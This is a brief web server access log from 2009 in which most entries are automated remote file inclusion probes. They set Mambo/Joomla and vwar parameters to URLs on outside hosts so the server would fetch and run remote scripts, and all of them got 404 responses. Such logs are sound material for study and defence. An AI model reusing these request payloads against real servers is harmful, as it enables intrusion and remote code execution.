94.23.212.189 - - [04/Sep/2009:02:10:11 -0400] "GET /logs/error_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
94.23.212.189 - - [04/Sep/2009:02:10:11 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
94.23.212.189 - - [04/Sep/2009:02:10:11 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
62.128.135.52 - - [04/Sep/2009:02:10:59 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.236.47.182 - - [04/Sep/2009:02:11:46 -0400] "GET /logs/access_log.Q109072500%20%20///vwar/backup/errors.php?error=http://www.sh1908.org//selah/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:02:11:58 -0400] "GET /logs/access_log.Q109072500%20%20///vwar/backup/errors.php?error=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
119.63.193.107 - - [04/Sep/2009:02:14:25 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
